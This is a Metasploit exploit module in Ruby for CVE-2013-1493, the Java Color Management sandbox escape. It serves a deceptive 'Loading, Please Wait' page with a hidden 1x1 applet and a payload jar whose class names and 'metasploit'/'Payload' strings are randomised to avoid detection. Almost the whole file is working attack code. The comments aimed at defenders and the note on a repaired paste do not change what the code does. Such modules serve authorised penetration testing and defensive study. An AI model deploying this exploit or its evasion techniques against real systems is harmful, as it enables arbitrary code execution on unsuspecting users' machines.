##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'
require 'rex'

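# Metasploit browser module for CVE-2013-1493 (Java Color Management classes).
#
# What the code below does:
#   * runs an HTTP server (HttpServer::HTML mixin) that answers three kinds of
#     request: a URI ending in ".jar", a URI ending in "/", and anything else;
#   * the "/" page is a minimal HTML document carrying a 1x1 <applet> tag;
#   * the ".jar" response is the framework payload jar with four pre-compiled
#     class files added from data/exploits/cve-2013-1493/.
#
# Notes for defenders, all read off this file:
#   * Affected versions per the module description: Java 7u15 and earlier and
#     6u41 and earlier. The vendor alert is listed under 'References'.
#   * The applet does not bypass click-to-play; the user has to accept the
#     Java warning before anything runs.
#   * The jar is served as application/octet-stream under a random 8-letter
#     name, and the "Init" class name is randomised per module run, so neither
#     is a stable indicator. The entry names Leak.class, MyBufferedImage.class
#     and MyColorSpace.class are added unchanged.
#
# NOTE(review): this listing was recovered from a paste that had filler
# characters injected around most lines and typographic quotes in place of
# ASCII quotes. The 'DefaultTarget' entry appeared displaced inside
# on_request_uri, the '[' opening the 'Author' list was missing, and there was
# one surplus trailing `end`. They are restored to where the surrounding
# syntax requires them; no behaviour has been added.
class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE

  include Msf::Exploit::Remote::BrowserAutopwn
  autopwn_info({ :javascript => false })

  # Registers the module metadata (name, description, references, targets).
  #
  # @param info [Hash] metadata supplied by the framework, merged through
  #   update_info with the values declared here.
  def initialize( info = {} )
    super( update_info( info,
      'Name'          => 'Java CMM Remote Code Execution',
      'Description'   => %q{
          This module abuses the Color Management classes from a Java Applet to run
        arbitrary Java code outside of the sandbox as exploited in the wild in February
        and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
        and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
        systems. This exploit doesn't bypass click-to-play, so the user must accept the java
        warning in order to run the malicious applet.
      },
      'License'       => MSF_LICENSE,
      'Author'        =>
        [
          'Unknown', # Vulnerability discovery and Exploit
          'juan vazquez' # Metasploit module (just ported the published exploit)
        ],
      'References'    =>
        [
          [ 'CVE', '2013-1493' ],
          [ 'OSVDB', '90737' ],
          [ 'BID', '58238' ],
          [ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
          [ 'URL', 'http://pastie.org/pastes/6581034' ]
        ],
      'Platform'      => [ 'win', 'java' ],
      'Payload'       => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
      'Targets'       =>
        [
          [ 'Generic (Java Payload)',
            {
              'Platform' => 'java',
              'Arch' => ARCH_JAVA
            }
          ],
          [ 'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch' => ARCH_X86
            }
          ]
        ],
      'DefaultTarget'  => 1,
      'DisclosureDate' => 'Mar 01 2013'
    ))
  end

  # Loads the four pre-compiled class files from the framework data directory
  # into instance variables and picks a random replacement for the "Init"
  # class name, then hands over to the parent setup.
  def setup
    @init_class           = read_exploit_class("Init.class")
    @leak_class           = read_exploit_class("Leak.class")
    @buffered_image_class = read_exploit_class("MyBufferedImage.class")
    @color_space_class    = read_exploit_class("MyColorSpace.class")

    # The replacement has the same length as "Init"; every occurrence of that
    # byte sequence inside the loaded class data is rewritten in place.
    @init_class_name = rand_text_alpha("Init".length)
    @init_class.gsub!("Init", @init_class_name)
    super
  end

  # Dispatches one HTTP request by the shape of its URI.
  #
  # @param cli the client connection object passed in by the HTTP server mixin
  # @param request the parsed request; only request.uri is read here
  def on_request_uri(cli, request)
    print_status("handling request for #{request.uri}")

    case request.uri
    when /\.jar$/i
      # Start from the payload jar and add the class files read in setup.
      jar = payload.encoded_jar
      jar.add_file("#{@init_class_name}.class", @init_class)
      jar.add_file("Leak.class", @leak_class)
      jar.add_file("MyBufferedImage.class", @buffered_image_class)
      jar.add_file("MyColorSpace.class", @color_space_class)

      # Same-length random strings replace "metasploit" and "Payload" in both
      # the entry names and the entry data of every jar member.
      metasploit_str = rand_text_alpha("metasploit".length)
      payload_str = rand_text_alpha("payload".length)
      jar.entries.each { |entry|
        entry.name.gsub!("metasploit", metasploit_str)
        entry.name.gsub!("Payload", payload_str)
        entry.data = entry.data.gsub("metasploit", metasploit_str)
        entry.data = entry.data.gsub("Payload", payload_str)
      }
      jar.build_manifest

      send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
    when /\/$/
      # Named differently from the `payload` accessor used in the branch above
      # so the local does not shadow it; only its presence is checked.
      regenerated = regenerate_payload(cli)
      unless regenerated
        print_error("Failed to generate the payload.")
        send_not_found(cli)
        return
      end
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
    else
      # Any other URI is redirected to the resource path with a trailing slash,
      # which lands in the branch above.
      send_redirect(cli, get_resource() + '/', '')
    end
  end

  # Builds the landing page: a "Loading" message plus a 1x1 <applet> element
  # whose archive is a random 8-letter .jar name and whose code attribute is
  # the randomised Init class name chosen in setup.
  #
  # @return [String] the HTML document
  def generate_html
    html  = %Q|<html><head><title>Loading, Please Wait...</title></head>|
    html += %Q|<body><center><p>Loading, Please Wait...</p></center>|
    html += %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@init_class_name}.class" width="1" height="1">|
    html += %Q|</applet></body></html>|
    html
  end

  private

  # Reads one file from data/exploits/cve-2013-1493/ under the framework
  # install root, in binary mode, and returns its full contents.
  #
  # @param file_name [String] base name of the class file
  # @return [String] raw bytes of the file
  def read_exploit_class(file_name)
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", file_name)
    File.open(path, "rb") { |fd| fd.read(fd.stat.size) }
  end
end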